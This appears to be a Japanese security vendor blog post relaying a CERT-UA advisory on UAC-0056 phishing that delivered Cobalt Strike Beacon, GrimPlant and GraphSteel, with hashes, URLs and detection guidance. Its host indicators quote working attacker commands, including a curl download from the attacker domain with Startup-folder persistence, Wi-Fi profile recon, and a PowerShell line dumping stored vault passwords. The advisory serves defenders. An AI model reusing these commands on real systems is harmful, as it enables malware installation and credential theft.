Cobalt Strike Beacon、GrimPlant、GraphSteelマルウェアがUAC-0056脅威アクターによって標的型フィッシングメールで大量拡散:CERT-UAアラート

[post-views]
3月 22, 2022 · 15 分で読めます
Cobalt Strike Beacon、GrimPlant、GraphSteelマルウェアがUAC-0056脅威アクターによって標的型フィッシングメールで大量拡散:CERT-UAアラート

この記事は、CERT-UAによって行われたオリジナルの研究を対象としています: https://cert.gov.ua/article/37704

2022年3月11日、ウクライナのコンピュータ緊急対応チーム(CERT-UA)は、ウクライナの国家機関を標的とした偽の電子メールの大量配信について報告しました。CERT-UAの研究によると、検出された悪意のある活動は、UAC-0056ハッカー集団に起因し、別名SaintBear、UNC2589、およびTA471としても追跡されています。ウクライナを標的とするUAC-0056は新しいことではありません。このハッカーグループは、比較的新しい WhisperGate データ消去攻撃にも関連しており、国の政府のオンライン資産を停止させました。

ウクライナに対するUAC-0056グループの攻撃:CERT-UA調査

CERT-UAの研究は、フィッシングキャンペーン中に偽の電子メールが大量にウクライナ国家機関になりすまして送られ、情報セキュリティを向上させる方法についての指示を広めたことを明らかにしました。電子メールには以下のリンクが含まれていました hxxps://forkscenter[.]fr/ 、被害者を騙して、以下のファイル『BitdefenderWindowsUpdatePackage.exe』内の「重要なサイバーセキュリティ更新プログラム」をダウンロードさせ、標的システムにマルウェア感染を広げました。

この悪意のあるファイル『BitdefenderWindowsUpdatePackage.exe』のダウンロード後、Cobalt Strike Beacon、GrimPlant、GraphSteelバックドアをさらに展開しました。まず、上記のファイルは「alt.exe」実行可能プログラムを有効にし、Discord配信プラットフォームから「one.exe」と「dropper.exe」ファイルをさらにダウンロードして実行しました。研究によると、有害なファイル「one.exe」は、一度実行されると、Cobalt Strike Beaconマルウェアでシステムを感染させます。さらに、「one.exe」ファイルは「wisw.exe」ファイルもダウンロードして実行し、調査中は利用可能でなかったDiscordサービスから悪意のある実行可能ファイル「cesdf.exe」をダウンロードする予定でした。

このルーチンはまたGoダウンローダー(「dropper.exe」)のインストールを結果として招きます。これはbase-64エンコードされたファイル(「java-sdk.exe」)をデコードおよび実行します。後者の「java-sdk.exe」ファイルは、持続性を維持するための新しいWindowsレジストリキーを追加し、さらに2つのペイロードをダウンロードして実行します:

  • 「microsoft-cortana.exe」はGraphSteelバックドアとして追跡されます。
  • 「oracle-java.exe」はGrimPlantバックドアとして知られています。

特に、Discord配信プラットフォームからのすべての実行ファイルはThemidaソフトウェア保護を利用しています。

CERT-UAが提供するグラフィックスは、UAC-0056脅威アクターによるウクライナ政府機関に対する最新のサイバー攻撃を表しています。

グローバルな侵害指標(IOC)

ファイル

ca9290709843584aecbd6564fb978bd6    Інструкція з антивірусного захисту.doc (ドキュメント-プリマ)
cf204319f7397a6a31ecf76c9531a549    Інструкція користувачів.doc (ドキュメント-プリマ)
b8b7a10dcc0dad157191620b5d4e5312    BitdefenderWindowsUpdatePackage.exe
2fdf9f3a25e039a41e743e19550d4040    alt.exe (Discordダウンローダー)
aa5e8268e741346c76ebfd1f27941a14    one.exe (Cobalt Strike Beaconを含む)
9ad4a2dfd4cb49ef55f2acd320659b83    wisw.exe (Discordダウンローダー) (2022-03-06 10:36:07)
15c525b74b7251cfa1f7c471975f3f95    dropper.exe (Goダウンローダー)
c8bf238641621212901517570e96fae7    java-sdk.exe (Goダウンローダー)
4f11abdb96be36e3806bada5b8b2b8f8    oracle-java.exe (GrimPlant)
9ea3aaaeb15a074cd617ee1dfdda2c26    microsoft-cortana.exe (GraphSteel) (2022-03-01 17:23:26)

ネットワーク指標

hxxps://forkscenter[.]fr/BitdefenderWindowsUpdatePackage.exe
hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174636830761/one.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174838165524/dropper.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949978571680673802/cesdf.exe
hxxps://nirsoft[.]me/s/2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl/field-keywords/
hxxps://nirsoft[.]me/nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb/avp/amznussraps/
hxxp://45[.]84.0.116:443/i
hxxp://45[.]84.0.116:443/m
hxxp://45[.]84.0.116:443/p
ws://45[.]84.0.116:443/c
forkscenter[.]fr (2022-01-29)
nirsoft[.]me    (2022-02-17)
45[.]84.0.116
156[.]146.50.5
-hobot- (User-Agent)

ホスト指標

%TMP%alt.exe
%PROGRAMDATA%one.exe
%PROGRAMDATA%dropper.exe
%USERPROFILE%.java-sdkjava-sdk.exe
%USERPROFILE%.java-sdkoracle-java.exe
%USERPROFILE%.java-sdkmicrosoft-cortana.exe
%USERPROFILE%AppDataLocalTempwisw.exe
%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupBitdefenderControl.lnk

HKCUSoftwareMicrosoftWindowsCurrentVersionRunJava-SDK

C:WindowsSystem32cmd.exe /C cd %USERPROFILE%AppDataLocalTemp & curl -O hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe & mklink %USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupBitdefenderControl.lnk %USERPROFILE%AppDataLocalTempwisw.exe
C:WindowsSystem32cmd.exe /C cd / & dir /S > %USERPROFILE%AppDataLocalTempRsjdjfvj.txt & ipconfig /all > %USERPROFILE%AppDataLocalTempRsjdrnjngfvj.txt
ipconfig /all
cmd /Q /C netsh wlan show profiles
netsh wlan show profiles
powershell /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC4AUABhAHMAcwB3AG8AcgBkAFYAYQB1AGwAdAAsAFcAaQBuAGQAbwB3AHMALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAPQBXAGkAbgBkAG8AdwBzAFIAdQBuAHQAaQBtAGUAXQA7ACQAdgBhAHUAbAB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC4AUABhAHMAcwB3AG8AcgBkAFYAYQB1AGwAdAA7ACQAdgBhAHUAbAB0AC4AUgBlAHQAcgBpAGUAdgBlAEEAbABsACgAKQAgAHwAIAAlACAAewAgACQAXwAuAFIAZQB0AHIAaQBlAHYAZQBQAGEAcwBzAHcAbwByAGQAKAApADsAJABfAH0AIAB8ACAAUwBlAGwAZQBjAHQAIABVAHMAZQByAE4AYQBtAGUALAAgAFIAZQBzAG8AdQByAGMAZQAsACAAUABhAHMAcwB3AG8AcgBkACAAfAAgAEYAbwByAG0AYQB0AC0AVABhAGIAbABlACAALQBIAGkAZABlAFQAYQBiAGwAZQBIAGUAYQBkAGUAcgBzAA==
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | Format-Table -HideTableHeaders

IOCに基づくハンティングクエリで、UAC-0056アクターが拡散するCobalt Strike Beacon、GrimPlant、GraphSteelマルウェアを検出

SOC PrimeのDetection as Codeプラットフォームは、Uncoder CTIツールへのアクセスを提供し、関連するIOCをカスタムでパフォーマンスを最適化したハンティングクエリに変換し、SIEMまたはXDRソリューションで実行可能にします。Uncoder CTIへのアクセスは現在 無料で利用可能 すべてのSOCプライムユーザーに対して、2022年5月25日まで。

 

Sigmaの振る舞いに基づくコンテンツで、UAC-0056アクターによるCobalt Strike Beacon、GrimPlant、GraphSteelマルウェアの拡散を検出

システム内のCobalt Strike Beacon、GrimPlant、およびGraphSteelマルウェアを検出するには、SOC Primeトレジャーバウンティ開発者から提供された以下のSigma行動規則を使用します Onur Atali:

UNC-0056脅威グループ Cobalt Strike – ウクライナ国家機関を標的に

MITRE ATT&CK® コンテキスト

ウクライナを標的とした最新のフィッシング攻撃のコンテキストにサイバーセキュリティ実務者が入り込むのを支援するために、Sigmaベースの検出コンテンツは、MITRE ATT&CKフレームワークv.10に基づいて以下の戦術および技術に対応しています:

Tactics 

Techniques

Sigma Rule

Defense Evasion

Deobfuscate/Decode Files or Information (T1140)

Process Injection (T1055)

Execution

Command and Scripting Interpreter (T1059)

また、下記のATT&CK NavigatorファイルをJSON形式でダウンロードすることができ、SOC PrimeプラットフォームからのSigmaルールとCERT-UAによって提供されたIOCに基づく関連するMITRE ATT&CKコンテキストを提供します:

MITRE ATT&CK NavigatorのJSONファイルをダウンロード

以下のバージョンがJSONファイルに適用可能です:

  • MITRE ATT&CK v10
  • ATT&CK Navigatorのバージョン:4.5.5
  • レイヤーファイルフォーマット:4.3

この記事は役に立ちましたか?

いいねと共有をお願いします。
SOCプライムのDetection as Codeプラットフォームに参加してください ビジネスに最も関連する脅威の可視性を向上させるために。開始をお手伝いし、即時の価値を提供するために、今すぐSOCプライムの専門家とミーティングを予約してください。

関連記事